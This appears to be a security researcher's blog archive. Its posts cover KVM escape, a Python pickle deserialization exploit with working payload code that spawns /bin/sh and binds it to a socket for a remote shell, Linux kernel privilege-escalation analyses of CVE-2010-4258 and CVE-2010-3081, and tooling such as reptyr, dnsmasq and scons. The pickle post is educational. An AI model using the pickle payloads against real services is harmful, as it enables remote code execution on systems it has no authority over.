BlackHat/DEFCON 2011 talk: Breaking out of KVM

I’ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux.

[Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you’ll need to get the exploit up and running in a local test environment, if you’re so inclined.

In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I’m also going to clean that up and release it, but don’t expect it too soon.

I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I’d met online and others I hadn’t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.

Aug 8th, 2011

Exploiting misuse of Python’s “pickle”

If you program in Python, you’re probably familiar with the pickle serialization library, which provides for efficient binary serialization and loading of Python datatypes. Hopefully, you’re also familiar with the warning printed prominently near the start of pickle‘s documentation:

Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

Recently, however, I stumbled upon a project that was accepting and unpacking untrusted pickles over the network, and a poll of some friends revealed that few of them were aware of just how easy it is to exploit a service that does this. As such, this blog post will describe exactly how trivial it is to exploit such a service, using a simplified version of the code I recently encountered as an example. Nothing in here is novel, but it’s interesting if you haven’t seen it.

The Target

The vulnerable code was a Twisted server that listened over SSL. The code looked roughly like the following:

class VulnerableProtocol(protocol.Protocol):
  def dataReceived(self, data):
 
     # Code to actually parse incoming data according to an
     #  internal state machine
     # If we just finished receiving headers, call verifyAuth() to
       check authentication
 
  def verifyAuth(self, headers):
    try:
      token = cPickle.loads(base64.b64decode(headers['AuthToken']))
      if not check_hmac(token['signature'], token['data'], getSecretKey()):
        raise AuthenticationFailed
      self.secure_data = token['data']
    except:
      raise AuthenticationFailed

So, if we just send a request that looks something like:

AuthToken: <pickle here>

The server will happily unpickle it.

Executing Code

So, what can we do with that? Well, pickle is supposed to allow us to represent arbitrary objects. An obvious target is Python’s subprocess.Popen objects — if we can trick the target into instantiating one of those, they’ll be executing arbitrary commands for us! To generate such a pickle, however, we can’t just create a Popen object and pickle it; For various mostly-obvious reasons, that won’t work. We could read up on the “pickle” format and construct a stream by hand, but it turns out there is no need to.

pickle allows arbitrary objects to declare how they should be pickled by defining a __reduce__ method, which should return either a string or a tuple describing how to reconstruct this object on unpacking. In the simplest form, that tuple should just contain

  • A callable (which must be either a class, or satisfy some other, odder, constraints), and
  • A tuple of arguments to call that callable on.

pickle will pickle each of these pieces separately, and then on unpickling, will call the callable on the provided arguments to construct the new object.

And so, we can construct a pickle that, when un-pickled, will execute /bin/sh, as follows:

import cPickle
import subprocess
import base64
 
class RunBinSh(object):
  def __reduce__(self):
    return (subprocess.Popen, (('/bin/sh',),))
 
print base64.b64encode(cPickle.dumps(RunBinSh()))

Getting a Remote Shell

At this point, we’ve basically won. We can run arbitrary shell commands on the target, and there are any number of ways we could bootstrap from here up to an interactive shell and whatever else we might want.

For completeness, I’ll explain what I did, since it’s a moderately cute trick. subprocess.Popen lets us select which file descriptors to attach to stdin, stdout, and stderr for the new process by passing integers for the stdin and similarly-named arguments, so we can open our /bin/sh on arbitrarily-numbered fd’s.

However, as mentioned above, the target server uses Twisted, and it serves all requests in the same thread, using an asynchronous event-driven model. This means we can’t necessarily predict which file descriptor on the server will correspond to our socket, since it depends on how many other clients are connected.

It also means, however, that every time we connect to the server, we’ll open a new socket inside the same server process. So, let’s guess that the server has fewer than, say, 20 concurrent connections at the moment. If we connect to the server’s socket 20 times, that will open 20 new file descriptors in the server. Since they’ll get assigned sequentially, one of them will almost certainly be fd 20. Then, we can generate a pickle like so, and send it over:

import cPickle
import subprocess
import base64
 
class Exploit(object):
  def __reduce__(self):
    fd = 20
    return (subprocess.Popen,
            (('/bin/sh',), # args
             0,            # bufsize
             None,         # executable
             fd, fd, fd    # std{in,out,err}
             ))
 
print base64.b64encode(cPickle.dumps(Exploit()))

We’ll open a /bin/sh on fd 20, which should be one of our 20 connections, and if all goes well, we’ll see a prompt printed to one of those. We’ll send some junk on that fd until we manage to get the original server to error out and close the connection, and we’ll be left talking to /bin/sh over a socket. Game over.

In Conclusion

Again, nothing here should be novel, nor would I expect any of these pieces to take a competent hacker more than few minutes to figure out, given the problem. But if this blog post teaches someone not to use pickle on untrusted data, then it will be worth it.

Mar 20th, 2011

reptyr: Changing a process’s controlling terminal

reptyr (announced recently on this blog) takes a process that is currently running in one terminal, and transplants it to a new terminal. reptyr comes from a proud family of similar hacks, and works in the same basic way: We use ptrace(2) to attach to a target process and force it to execute code of our own choosing, in order to open the new terminal, and dup2(2) it over stdout and stderr.

The main special feature of reptyr is that it actually changes the controlling terminal of the target process. The “controlling terminal” is a concept maintained by UNIX operating systems that is independent of a process’s file descriptors. The controlling terminal governs details like where ^C gets delivered, and how applications are notified of changes in window size.

Processes are grouped into two levels of hierarchical groups: sessions, and process groups. Each group is named by an ID, which is the PID of the initial leader (either “session leader” or “process group leader”). Even if the leader exits, that number is still the ID for the group. Sessions are used for terminal management — Every process in a session has the same controlling terminal, and each terminal belongs to at most one session. Process groups are a sub-division within sessions, and are used primarily for job control within the shell. For a more in-depth explanation, see part 3 of my earlier series on termios.

If you check out tty_ioctl(4), you’ll find that Linux has an ioctl, TIOCSCTTY, that can be used to set the controlling terminal of a process, and you could be forgiven for thinking that all we need is to make the target call that ioctl, and we’re done.

However, if we read closer, we find that it has several restrictions. In particular:

The calling process must be a session leader and not have a controlling terminal already. If this terminal is already the controlling terminal of a different session group then the ioctl fails with EPERM […]

In the typical case, where I’m trying to attach a (say) mutt that you spawned from your shell, mutt won’t be a session leader — your shell will be the session leader, and mutt will be the process group leader for a process group containing only itself.

So, we need to make the target a session leader. Conveniently, there’s a system call for that: setsid(2).

However, reading that man page, we find a new caveat: setsid(2) fails with EPERM if

The process group ID of any process equals the PID of the calling process. Thus, in particular, setsid() fails if the calling process is already a process group leader.

The shell creates a new process group for every job you launch, and so our target mutt will be a process group leader, and unable to setsid(). The usual solution for programs that want to setsid is to fork(), so that the child is still in the parent’s session and process group, and then setsid() in the child. However, fork()ing our mutt and killing off the parent seems potentially disruptive, so let’s see if we can avoid that.

So, we’re going to need to change mutt‘s process group ID, so that there are no processes with process group IDs equal to its PID. Following some trusty SEE ALSO links, we get to setpgid(2). There’s a bunch of text in that man page, but the key bit is:

If setpgid() is used to move a process from one process group to another, both process groups must be part of the same session (see setsid(2) and credentials(7)). In this case, the pgid specifies an existing process group to be joined and the session ID of that group must match the session ID of the joining process.

We need to find a process group in the same session as mutt to move our mutt into, and then we’ll be able to setsid. We could try to find one — the shell is a plausible candidate, for instance — but there’s an alternate, more direct route: Create one.

While we have mutt captured with ptrace, we can make it fork(2) a dummy child, and start tracing that child, too. We’ll make the child setpgid to make it into its own process group, and then get mutt to setpgid itself into the child’s process group. mutt can then setsid, moving into a new session, and now, as a session leader, we can finally ioctl(TIOCSCTTY) on the new terminal, and we win.

It turns out I didn’t invent this technique — injcode and neercs work the same way. But I did discover it independently of them, and it was a fun little hunt through unix arcana.

Feb 8th, 2011

reptyr: Attach a running process to a new terminal

Over the last week, I’ve written a nifty tool that I call reptyr. reptyr is a utility for taking an existing running program and attaching it to a new terminal. Started a long-running process over ssh, but have to leave and don’t want to interrupt it? Just start a screen, use reptyr to grab it, and then kill the ssh session and head on home.

You can grab the source, or read on for some more details.

There’s a shell script called screenify that’s been going around the internet for nigh on 10 years now that is supposed to use gdb to accomplish the same thing. There’s also a project called retty that tries to do the same thing, in C using ptrace() directly.

The difference between those programs and reptyr is that reptyr works much, much, better.

If you attach a less using screenify or retty, it will still take input from the old terminal. If you attach an ncurses program, and resize the window, the program probably won’t resize correctly. ^C and ^Z will still be processed on the old terminal — typing them in the new terminal won’t do anything useful.

reptyr fixes all of these problems and more, and is the only such tool I know of that does so. I’ve never seen a program that doesn’t behave noticeably incorrectly after attaching with retty or screenify, whereas with reptyr most programs I have tried work flawlessly.

How does it work?

reptyr works in the same basic way as screenify and retty — it attaches to the target process using the ptrace API, opens the new terminal, and dup2s it over the old file descriptors. It also copies the termios settings from the old terminal to the new terminal.

The main thing that reptyr does that no one else does is that it actually changes the controlling terminal of the process you are attaching. This is the detail that makes many things Just Work, including ^C and ^Z and window resizing.

Switching the target’s controlling terminal is not easy and involves a fair bit of trickery with ptrace and Linux’s terminal APIs. I will probably do another blog post some time about the dirty details of how I make this work, but for now you can check out attach.c if you really want to know.

reptyr still has a number of limitations — it doesn’t generally work, for example, if the target process has any children. I know how to fix most of these problems, though, so expect it to get better with time. Please let me know if you find it useful!

Appendix

(Edited to add:) Nothing is really new. A commenter on reddit pointed out that injcode and neercs both accomplish the same thing, even using the same trick to change the CTTY. Ah well, I had run writing it anyways, and apparently I wasn’t the only one who didn’t know about the existing alternatives. neercs is a full screen replacement, though, and I think that reptyr should be more robust than injcode — I use a different techique for ptrace-hijacking, for example — and so hopefully this tool still has a niche as a more robust standalone utility. Certainly, judging from the amount of enthusiasm I’ve seen for this tool, this still isn’t a problem that is solved to the average user’s satisfaction.

Jan 21st, 2011

Some Android reverse-engineering tools

I’ve spent a lot of time this last week staring at decompiled Dalvik assembly. In the process, I created a couple of useful tools that I figure are worth sharing.

I’ve been using dedexer instead of baksmali, honestly mainly because the former’s output has fewer blank lines and so is more readable on my netbook’s screen. Thus, these tools are designed to work with the output of dedexer, but the formats are simple enough that they should be easily portable to smali, if that’s your tool of choice (And it does look like a better tool overall, from what I can see).

ddx.el

I’m an emacs junkie, and I can’t stand it when I have to work with a file that doesn’t have an emacs mode. So, a day into staring at un-highlighted .ddx files in fundamental-mode, I broke down and threw together ddx-mode. It’s fairly minimal, but it provides functional syntax highlighting, and a little support for navigating between labels. One cute feature I threw in is that, if you move the point over a label, any other instances of that label get highlighted, which I found useful in keeping track of all the “lXXXXX” labels dedexer generates.

An example file (from k9mail) highlighted using ddx-mode

ddx2dot

Dalvik assembly is, on the whole pretty easy to read, but occasionally you stumble on huge methods that clearly originated from multiple nested loops and some horrible chained if statements. And what you’d really like is to be able to see the structure of the code, as much as the details of the instructions.

To that end, I threw together a Python script that “parses” .ddx files, and renders them to a control-flow graph using dot. As an example, the parseToken method from the IMAP parser in the k9mail application for Android looks like the following, when disassembled and rendered to a CFG:

A CFG for k9mail's ImapResponseParser.parseToken method

I use the term “parses” because it’s really just a pile of regexes, line.split() and line.startswith("..."), but it gets the job done, so I hope it might be of use to someone else. The biggest missing feature is that it doesn’t parse catch directives, so those just end up floating out to the side as unattached blocks.

You’ll also notice the rounded “return” blocks — either javac or dx merges all exits from a function to go through the same return block, but I found that preserving that feature in the CFG produces a lot of clutter and makes it hard to read, so I lift every edge that would go to that common block to go to a separate block.

Github

Both tools live in my “reverse-android” repository on github, and are released under the MIT license. Please feel free to do whatever you want with them, although I’d appreciate it if you let me know if you make any improvements or find them useful.

CVE-2010-4258: Turning denial-of-service into privilege escalation

Dan Rosenberg recently released a privilege escalation bug for Linux, based on three different kernel vulnerabilities I reported recently. This post is about CVE-2010-4258, the most interesting of them, and, as Dan writes, the reason he wrote the exploit in the first place. In it, I’m going to do a brief tour of the various kernel features that collided to make this bug possible, and explain how they combine to turn an otherwise-boring oops into privilege escalation.

access_ok

When a user application passes a pointer to the kernel, and the kernel wants to read or write from that pointer, the kernel needs to perform various checks that a buggy or malicious userspace app hasn’t passed an “evil” pointer.

Because the kernel and userspace run in the same address space, the most important check is simply that the pointer points into the “userspace” part of the address space. User applications are protected by page table permissions from writing into kernel memory, but the kernel isn’t, and so must explicitly check that any pointers given to it by a user don’t point into the kernel region.

The address space is laid out such that user applications get the bottom portion, and the kernel gets the top, so this check is a simple comparison against that boundary. The kernel function that performs this check is called access_ok, although there are various other functions that do the same check, implicitly or otherwise.

get_fs() and set_fs()

Occasionally, however, the kernel finds it useful to change the rules for what access_ok will allow. set_fs()1 is an internal Linux function that is used to override the definition of the user/kernel split, for the current process.

After a set_fs(KERNEL_DS), no checking is performed that user pointers point to userspace — access_ok will always return true. set_fs(KERNEL_DS) is mainly used to enable the kernel to wrap functions that expect user pointers, by passing them pointers into the kernel address space. A typical use reads something like this:

old_fs = get_fs(); set_fs(KERNEL_DS);
vfs_readv(file, kernel_buffer, len, &pos);
set_fs(old_fs);

vfs_readv expects a user-provided pointer, so without the set_fs(), the access_ok() inside vfs_readv() would fail on our kernel buffer, so we use set_fs() to effectively temporarily disable that checking.

Kernel oopses

When the kernel oopses, perhaps because of a NULL pointer dereference in kernelspace, or because of a call to the BUG() macro to indicate an assertion failure, the kernel attempts to clean up, and then tries to kill the current process by calling the do_exit() function to exit the current process.

When the kernel does so, it’s still running in the same process context it was before the oops occured, including any set_fs() override, if applicable. Which means that do_exit will get called with access_ok disabled — not something anyone expected when they wrote the individual pieces of this system.

clear_child_tid

As it turns out, do_exit contains a write to a user-controlled address that expects access_ok to be working properly!

clear_child_tid is a feature where, on thread exit, the kernel can be made to write a zero into a specified address in that thread’s address space, in order to notify other threads of that exit.

This is implemented by simply storing a pointer to the to-be-zeroed address inside struct task_struct (which represents a single thread or process), and, on exit, mm_release, called from do_exit, does:

put_user(0, tsk->clear_child_tid);

This is normally safe, because put_user checks that its second argument falls into the “userspace” segment before doing a write. But, if we are running with get_fs() == KERNEL_DS, it will happily accept any address at all, even one pointing into kernel space.

So, if we find any kernel BUG() or NULL dereference, or other page fault, that we can trigger after a set_fs(KERNEL_DS), we can trick the kernel into a user-controlled write into kernel memory!

splice() et. al.

An obvious question at this point is: How much of the kernel can an attacker cause to run with get_fs() == KERNEL_DS?

There are a number of small special cases. For example, the binary sysctl compatibility code works by calling the normal /proc/ write handlers from kernelspace, under set_fs(). handful of compat-mode (32 on 64) syscalls work similarly.

By far the biggest source I’ve found, however, is the splice() system call. The splice() system call is a relatively recent addition to Linux, and allows for zero-copy transfer of pages between a pipe and another file descriptor.

As of 2.6.31, attempts to splice() to or from an fd that doesn’t support special handling to actually do zero-copy splice, will fall back on doing an ordinary read(), write(), or sendmsg() on the fd … from the kernel, using set_fs() in order to pass in kernel buffers.

What that means it that by using splice(), an attacker can call the bulk of the code in most obscure filesystems and socket types (which tend not to have explicit splice() support) with a segment override in place. Conveniently for an attacker, that is also exactly a description of where the bulk of the random security bugs tend to be.

This is also exactly the technique Dan’s exploit uses. He uses CVE-2010-3849, an otherwise boring NULL pointer dereference I reported in the Econet network protocol. His exploit code does a splice() to an econet socket, causing the econet_sendsmg handler to get called under set_fs(KERNEL_DS). When it oopses, do_exit is called, and he gets a user-controlled write into kernel memory. Everything else is just details.

Footnotes:

1 Back in Linux 1.x, this function actually set the %fs register on i386. It hasn’t in years, but it’s used in too many places for changing the name to be worth it.

Dec 10th, 2010

Some notes on CVE-2010-3081 exploitability

Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered an announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time.

While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE were wrong, and it was even more broadly exploitable than was publically documented. I’d like to share those observations here.

A brief review of the bug

The bug arose from the compat_alloc_user_space function in Linux’s 32-bit compatibility support on 64-bit systems. compat_alloc_user_space allocates and returns space on the userspace kernel stack for the kernel to use:

static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs->sp - len;
}

This function is only called by compat-mode syscalls, so current is assumed to be a 32-bit process, in which case regs->sp, the user stack pointer, will be a 32-bit quantity. This, if we subtract a small len, the result should still fit in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the user address space.

Because of this, some callers of compat_alloc_user_space were lazy, and did not call access_ok (or a function which called access_ok) to check that the result of compat_alloc_user_space fell within the user address space.

However, it turned out that some call sites in the kernel called compat_alloc_user_space with a user-controlled len value, allowing the subtraction to wrap around. On a 64-bit system, the kernel lives in the top four gigabytes of memory, and so this wraparound is enough for a user to cause compat_alloc_user_space to return a pointer into the kernel’s address space.

Moreover, it turned out that the functions that used a user-controlled len also did not check access_ok on the result of the allocation. In particular, Linux 2.6.26 introduced the compat_mc_getsockopt function, which called compat_alloc_user_space with a user-controlled length and then copied user-controlled data to this pointer. It is this function which the public exploit targetted.

Disabling 32-bit binaries doesn’t help

When an exploit was released for this bug, many sources circulated a mitigation: Disable 32-bit binaries on a system. Prevent compat-mode processes from running, the logic goes, and you prevent anyone from making a compat-mode syscall that triggers the vulnerable path.

This mitigation indeed prevented the public exploit from working (it included 32-bit inline assembly, and so couldn’t even easily be recompiled as a 64-bit binary), and many observers seemed to believe it closed the bug entirely.

However, this was not the case! It turns out, on an amd64 system, a 64-bit process can still make a compat-mode system call using the int $0x80 instruction, which is the traditional 32-bit syscall mechanism! Even though the process is running in 64-bit mode, int $0x80 redirects to the compat-mode syscall table.

After realizing this, modifying the public exploit to work when compiled in 64-bit mode was a simple matter of porting the inline assembly, and changing a small handful of types. I’ve posted the modified exploit and the diff against the original for the curious.

The integer overflow is totally irrelevant

Once you’ve realized that you can make compat-mode system calls from a 64-bit process, a little bit of thought reveals something else interesting. compat_alloc_user_space subtracts the len value off of the userspace stack pointer. Previously, we relied on subtracting a large value from a 32-bit stack pointer in order to end up with a kernel pointer. However, while a 32-bit is limited to a 32-bit stack pointer, a 64-bit process can write a full 64-bit value into %rsp, and thus regs->sp! There’s no need for underflow at all — you can just write a 64-bit value into %rsp and do an int $0x80, and make compat_alloc_user_space return any value you please!

The condition for exploitability thus drops from “user-controlled len and no access_ok” to simply “no access_ok“.

This is interesting, because it turns out that some very old kernels, before 2.6.11, including RHEL 4, have the following function:

int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&u_ifreq64->ifr_ifrn.ifrn_name[0], &tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &u_ifreq64->ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}

Remember, we can make compat_alloc_user_space return an arbitrary value. The copy_to_user will call access_ok and fail, but that return value will be discarded, and the __put_user will scribble 32 bits of user-controlled data at a user-controlled address. Bingo, local root.

It turns out this function was present in Linux 2.4.x, too, meaning that this exploit even affected RHEL3 and anyone else still running a 2.4-based system!

Based on this exploit, I’ve produced a working proof-of-concept exploit for RHEL4, based on the released exploit for RHEL5. Contact me if you’re interested, but it’s pretty straightforward.

Closing notes

As far as I know, neither of these facts has been publically documented prior to this post. I shared this information with Red Hat, and they requested I keep it private until they released fixes for RHEL 3, which happened last week. I would not be at all surprised to learn that someone else has private exploits that incorporate either or both of these observations, though.

One important moral here is you must be very careful when declaring a system unaffected by a vulnerability, or declaring a mitigation to be complete. Software systems have gotten tremendously complex, and it’s often impossible to be totally confident you understand every last way an attacker could tickle a vulnerability.

Nov 30th, 2010

Why scons is cool

I’ve recently started playing with scons a little for some small personal projects. It’s not perfect, but I’ve rapidly come to the conclusion that it’s a probably far better choice than make in many cases. The main exceptions would be cases where you need to integrate into legacy build systems, or if asking or expecting developers to have scons installed is unreasonable for some reason.

The main reason that scons is cool to me, and the thing that makes it fundamentally different from make, is the introduction of actual scoping.

make has a single global scope. This is one of the main reasons that people write recursive Makefiles; By giving you one file per directory, you get one scope per directory, which makes it possible to have per-directory pattern rules, variables, and all that other stuff, without driving yourself insane.

make‘s awful syntax, confusing varieties of variable, whitespace-sensitivity, and all the other things that people love to bitch about are annoying, but to my mind, the single scope that makes recursive Makefiles the dominant (and, really, the only scalable) paradigm is the one thing that really sucks.

scons solves this by baking various kinds of scoping into the tool. scons lets you include sub-build-scripts (typically named SConscript, by convention). Those scripts run in their own namespace and can establish their own variables, rules, etc., but the end result is then merged back into the global rule list (handling sub-directory paths intelligently), so that the scheduler can work globally, instead of having to recurse.

Furthermore, because of this explicit scoping, you can pass variables, including targets, between build files, letting you explicitly set up cross-directory dependencies or share CFLAGS or other variables, making it easy for different directories to share exactly as much or as little configuration as you want.

In addition, scons has the concept of “build environments”, which are objects that include build rules, variables, and so on. By reifying what make just represents as the global environment into objects, it makes it much easier to scope and program things. For example, if you have a set of targets that should be built using the global default rules, except with debugging enabled, you can do:

myenv = env.Clone()
myenv.Append(CFLAGS = ['-g'])
myenv.Program(...)

By making it (optionally) explicit which sets of rules and variables are being used in each place, it becomes much easier to share multiple kinds of targets and rule sets in a single file, without necessitating lots of sub-files just for scoping, like make tends to lead to.

scons is cool for a bunch of reasons. It eliminates most of the stupid little annoyances you’ve probably had with make. But, in my mind, this is the thing that makes it cool. They’ve added sane scoping to the build tool, so that you can construct non-recursive build systems without going insane.

I’ll definitely be considering scons for any new projects I write going forward. I hate make, and this definitely feels like a path forward.

Nov 7th, 2010
Tags: , , , ,

Configuring dnsmasq with VMware Workstation

I love VMware workstation. I keep VMs around for basically every version of every major Linux distribution, and use them heavily for all kinds of kernel testing and development.

This post is a quick writeup of my networking setup with VMware Workstation, using dnsmasq to assign my VMs addresses and provide a DNS server to resolve VM addresses.

The objective

I want to be able to resolve my VM’s hostnames so that I can ssh to them, or run other network services and access them from the host. I could just assign static addresses and put them in /etc/hosts, but that’s totally lame, and liable to be a source of error and frustration, because I have dozens of VMs, and add and remove them frequently.

We’re going to set things up so that when VMs get addresses from DHCP, their hostnames automatically become resolvable, using the .vmware domain. To do this, we’re going to set up a piece of software called dnsmasq, which is a flexible DNS and DHCP server, designed for basically exactly this purpose.

The setup

Because I use my VMs for local testing, I just keep most of them on a local NAT on my machine. I configure that virtual network inside VMware as follows (run vmware-netconfig, or follow the appropriate menus):

Note how I disable “Use local DHCP service to distribute IP addresses to VMs” — we’re going to set up dnsmasq to prove DHCP, so we don’t want it fighting with VMware’s.

Notice that the subnet I’m using here is 172.16.37.* — if you choose a different one, you’ll need to adjust accordingly later.

Configuring dnsmasq

Then, I install dnsmasq, and configure /etc/dnsmasq.conf as follows:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

server=192.168.1.1
local=/vmware/

no-hosts
no-resolv

domain=vmware
dhcp-fqdn

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative
dhcp-option=option:router,172.16.37.2

Here’s what each of those lines mean, in order:

listen-address=172.16.37.1
listen-address=127.0.0.1
no-dhcp-interface=lo

We don’t want dnsmasq serving DHCP or DNS to the outside world or other virtual networks, so we only tell it to listen on the local interface — so that we can talk to it from the host — and to the virtual network we set up in the previous step. We don’t want it serving DHCP to localhost, though, so we tell it not to.

server=192.168.1.1
local=/vmware/

Here we tell dnsmasq how to forward DNS requests to the outside world. We’re going to be using dnsmasq as our primary nameserver, and having it forward requests for things it doesn’t understand to a real DNS server. In my case, that’s my LAN’s router, at 192.168.1.1. The local line tells dnsmasq that the .vmware domain is local, and it should never forward requests to resolve things in that domain.

If I needed something more complicated, it might be possible to use the resolv-file option or similar, but I don’t, personally.

no-hosts
no-resolv

These options tell dnsmasq not to look at resolv.conf or /etc/hosts when resolving names — we want it only to resolve VMs itself, and to forward everything else.

domain=vmware
dhcp-fqdn

This tells dnsmasq to assign the .vmware domain to hosts it hands out DHCP to, so that we can resolve VMs in the .vmware domain.

dhcp-range=172.16.37.3,172.16.37.200,12h
dhcp-authoritative

And finally, we configure the DHCP server. We give it a range of addresses to assign on the subnet we created earlier. I stop at .200, so that I can leave the last few open for static IPs if I need for some reason, and we start at .3.1 is the host, and .2 is the address of VMware’s router. dhcp-authoritative enables some optimizations when dnsmasq knows it is the only DHCP server around.

dhcp-option=option:router,172.16.37.2

Finally, we need dhcp-option to tell DHCP clients to use the VMware-provided router at .2 as their gateway, instead of using the host, at .1. We could configure the host to be a NAT server using Linux’s NAT, but that’s outside the scope of this document.

Configuring the host

Now, we need to configure the host to use dnsmasq as our DNS server. This is a simple matter of telling the host to use 127.0.0.1 as our DNS server, and to add .vmware to our search path. If we’re editing resolv.conf directly, it would look like:

search vmware
nameserver 127.0.0.1

Configuring guests

We need to configure our guests to send a hostname along with their DHCP requests, so that dnsmasq can add them to its address table. How to do this varies by OS, but most modern OSes do it automatically. If they don’t, here are a few hints:

For RHEL-based distros, edit /etc/sysconfig/network-scripts/ifcfg-INTERFACE, and add a line like

 DHCP_HOSTNAME=centos-5-amd64

For most other Linux distributions, you can often edit dhclient.conf (usually in /etc/ or /etc/dhclient/) to include:

 send host-name "centos-5-amd64";

Or, with a recent dhclient,

 send host-name "<hostname>";

will make it look up the machine’s actual hostname.

Conclusions

That’s all there is to it. This is a pretty simple setup, but hopefully someone else will find this useful. If you need dnsmasq to do something more subtle, the documentation is mostly quite good.

Oct 24th, 2010

Using Haskell’s ‘newtype’ in C

A common problem in software engineering is avoiding confusion and errors when dealing with multiple types of data that share the same representation. Classic examples include differentiating between measurements stored in different units, distinguishing between a string of HTML and a string of plain text (one of these needs to be encoded before it can safely be included in a web page!), or keeping track of pointers to physical memory or virtual memory when writing the lower layers of an operating system’s memory management.

Unless we’re using a richly-typed language like Haskell, where we can use newtype, the best solutions tend to just rely on convention. The much-maligned Hungarian Notiation evolved in part to try to combat this sort of problem — If you decide on a convention that variables representing physical addresses start with pa and virtual addresses start with va, then anyone who encounters a uintptr_t pa_bootstack; can immediately decode the intent.

It turns out, though, that we can get something very much like newtype in familiar old C. Suppose we’re writing some of the paging code for a toy x86 architecture. We’re going to be passing around a lot of physical and virtual addresses, as well as indexes of pages in RAM, and it’s going to be easy to confuse them all. The traditional solution is to use some typedefs, and then promise to be very careful to mix them up:

typedef uint32_t physaddr_t;
typedef uint32_t virtaddr_t;
typedef uint32_t ppn_t;

We have to promise not to mess up, though — the compiler isn’t going to notice if I pass a ppn_t to a function that wanted a physaddr_t.

This example was inspired by JOS, a toy operating system used by MIT’s Operating Systems Engineering class. JOS remaps all of physical memory starting at a specific virtual memory address (KERNBASE), and so provides the following macros:

/* This macro takes a kernel virtual address -- an address that points above
 * KERNBASE, where the machine's maximum 256MB of physical memory is mapped --
 * and returns the corresponding physical address.  It panics if you pass it a
 * non-kernel virtual address.
 */
#define PADDR(kva)                                          \
({                                                          \
        physaddr_t __m_kva = (physaddr_t) (kva);            \
        if (__m_kva < KERNBASE)                                     \
                panic("PADDR called with invalid kva %08lx", __m_kva);\
        __m_kva - KERNBASE;                                 \
})

/* This macro takes a physical address and returns the corresponding kernel
 * virtual address.  It panics if you pass an invalid physical address. */
#define KADDR(pa)                                           \
({                                                          \
        physaddr_t __m_pa = (pa);                           \
        uint32_t __m_ppn = PPN(__m_pa);                             \
        if (__m_ppn >= npage)                                       \
                panic("KADDR called with invalid pa %08lx", __m_pa);\
        (void*) (__m_pa + KERNBASE);                                \
})

Because the typedefs are unchecked by the compiler, though, it is a common mistake to use a physical address where a virtual address is meant, and nothing will catch it until your kernel triple-faults, and a long, painful debugging session ensues.

Inspired by Haskell’s newtype, though, it turns out we can get the compiler to check it for us, with a little more work, by using a singleton struct instead of a typedef:

typedef struct { uint32_t val; } physaddr_t;

If we wanted to be overly cute, we could even use a macro to mimic Haskell’s newtype:

#define NEWTYPE(tag, repr)                  \
    typedef struct { repr val; } tag;       \
    static inline tag make_##tag(repr v) {  \
            return (tag){.val = v};         \
    }                                       \
    static inline repr tag##_val(tag v) {   \
            return v.val;                   \
    }

NEWTYPE(physaddr, uint32_t);
NEWTYPE(virtaddr, uint32_t);
NEWTYPE(ppn,  uint32_t);

Given those definitions, PADDR and KADDR become:

#define PADDR(kva)                                          \
({                                                          \
    if (virtaddr_val(kva) < KERNBASE)                       \
            panic("PADDR called with invalid kva %08lx", virtaddr_val(kva)); \
    make_physaddr(virtaddr_val(kva) - KERNBASE);            \
})

#define KADDR(pa)                                           \
({                                                          \
    uint32_t __m_ppn = physaddr_val(pa) >> PTXSHIFT;        \
    if (__m_ppn >= npage)                                   \
            panic("KADDR called with invalid pa %08lx", physaddr_val(pa)); \
    make_virtaddr(physaddr_val(pa) + KERNBASE);             \
})

We have to use some accessor and constructor functions, but in exchange, we get strong type-checking: If you pass PADDR a physical address (or anything other than a virtual address), the compiler will catch it.

The wrapping and unwrapping is slightly annoying, but we can for the most part avoid having to do it everywhere, by pushing the wrapping and unwrapping down into some utility functions. For instance, a relatively common operation at this point in JOS is creating a page-table entry, given a physical address. If you want to construct the PTE by hand, you need to use physaddr_val every time. But a better plan is a simple utility function:

 static inline pte_t make_pte(physaddr addr, int perms) {
     return physaddr_val(addr) | perms;
 }

In addition to losing the need to unwrap the physaddr everywhere, we gain a measure of clarity and typechecking — if you remember to use make_pte, you’ll never accidentally try to insert a virtual address into a page table.

We can add similar functions for converting between types, as well a a struct Page, used to track metadata for a physical page. As an experiment, I went and reimplemented JOS’s memory management primitives using these definitions, and only needed to use FOO_val or make_FOO a very few times outside of the header files that defined KADDR and friends.

Performance

While the typechecking is nice, any C programmer implementing a memory-management system is probably going to want to know: How much does it cost me? You’re creating and unpacking these singleton structs everywhere – does that have a cost?

The answer, though, in almost all cases is “no” — A half-decent compiler will optimize the resulting code to be completely identical to the code without the structs, in almost all cases.

Also, the in-memory representation of the struct is going to be exactly the same as the bare value — it’s even guaranteed to have the same alignment and padding constraints, so if you need to embed a physaddr inside another struct, or into an array, the representation is identical to the physaddr_t typedef.

On i386, parameters are passed on the stack, so that means that passing the struct is identical to passing the uint32_t. On amd64, as described last week, small structures are passed in registers, and so, again, the calling convention is identical.

Unfortunately, the i386 ABI specifies that returned structs always go on the stack (while integers go in %eax), so you do pay slightly if you want to return one of these typedef’d objects. amd64 will also break it down into a register, though, so on a 64-bit machine it’s again identical.

If you’re worried, though, you can always use the preprocessor to make the checks vanish for a production build:

#ifdef NDEBUG
#define NEWTYPE(tag, repr)                  \
    typedef repr tag;                       \
    static inline tag make_##tag(repr v) {  \
            return v;                       \
    }                                       \
